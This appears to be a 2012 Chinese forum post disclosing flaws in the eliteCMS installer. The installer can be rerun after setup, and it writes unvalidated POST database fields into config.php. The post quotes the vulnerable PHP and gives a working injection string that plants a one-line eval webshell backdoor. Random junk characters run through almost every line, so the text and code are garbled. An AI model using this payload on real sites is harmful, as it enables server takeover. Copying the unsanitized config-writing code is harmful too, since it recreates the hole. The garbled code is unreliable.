eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
' W v* R: l( ?; A7 Y
7 W S e) w4 D! E8 W! y另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php1 }( x$ _/ W! ?& W' y+ b+ H
我们来看代码:
0 |5 X, ]; ^% @6 o
% s" f6 @ i3 H+ l2 V...+ v2 Z1 ] l4 O5 \/ s7 N1 r
elseif ($_GET['step'] == "4") {
: T: e( }0 w$ K8 R- P% m) z. N $file = "../admin/includes/config.php";+ J. y. k- _1 x' y) }& F" ?
$write = "<?php\n";
; _: {% ]! ?- i3 f1 ?* A $write .= "/**\n";7 r4 G+ P, ~% u1 B7 J I+ }
$write .= "*\n";
8 S* j/ G, J% ^% S- D $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";# j2 {( m- r5 N$ E- \1 w1 s, j: [
...略...
v* @1 W# m/ n7 g$ H7 E$ _3 B $write .= "*\n";
) H. g; Q4 M( ~9 A# r/ j7 { $write .= "*/\n";
0 W6 Z Z& e/ @5 ~4 J- x9 K $write .= "\n";) Y2 _# A7 @( Z4 k9 u
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";+ Z* z7 {; L4 E3 ]% q
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
1 A& S% R( J p. q2 z1 ?2 ] $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";) b+ _% P# N( p) n
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$ j1 Y5 C' V" o8 h3 Q! S $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";1 X9 I D O8 G! p. n6 x
$write .= "if (!\$connection) {\n";
" X. V1 m: a9 C! P( D% N $write .= " die(\"Database connection failed\" .mysql_error());\n";
1 Z7 _+ _' W) q& g! [: j# y b $write .= " \n";
4 v, D! E8 ?; ^( g8 ] $write .= "} \n";
( y2 J+ i+ q$ Z) G $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";' ]4 ~1 M8 Q' Z& k
$write .= "if (!\$db_select) {\n";
% A2 a' z; |$ r6 @ $write .= " die(\"Database select failed\" .mysql_error());\n";
7 I1 B; k3 ~/ n- P $write .= " \n";
]( c! O& P! B $write .= "} \n";
7 z; e( l% o- C% f: J $write .= "?>\n";
# e( n+ A. H" ~' ` . F( ^% f! ~/ _0 r, v
$writer = fopen($file, 'w');
m( L R9 s* A) `6 X+ P6 {...! X! s( Y9 ^# W8 ?3 A
. ~8 H' F- t- O- [) V
在看代码:9 K7 M7 r! V& P( P5 }
) d* Z* w9 f5 O$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
0 k2 R* g8 i+ r4 p: @; N8 N! K0 ~# A: Y$_SESSION['DB_NAME'] = $_POST['DB_NAME'];# v$ v+ w: Y! q6 m; o
$_SESSION['DB_USER'] = $_POST['DB_USER'];$ G( M! V3 \7 e7 Y& F
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
6 o( ]& |+ F' \4 e$ o- z `) Z3 G1 l6 O, W: X0 s
取值未作任何验证. L. K1 Z* R: R4 ~0 Q$ x3 E5 f2 o
如果将数据库名POST数据:
N* B4 o/ d f, i! u! E5 | - }4 L0 ~( |; j- C
"?><?php eval($_POST[c]);?><?php7 y( a/ m$ M! ` h8 c0 d* b
+ A( S1 U' D9 L* M, f' R$ q" [$ E7 M
将导致一句话后门写入/admin/includes/config.php K' q; H" e9 b: c
|
发表于 2012-11-18 13:59:27
收藏
支持
反对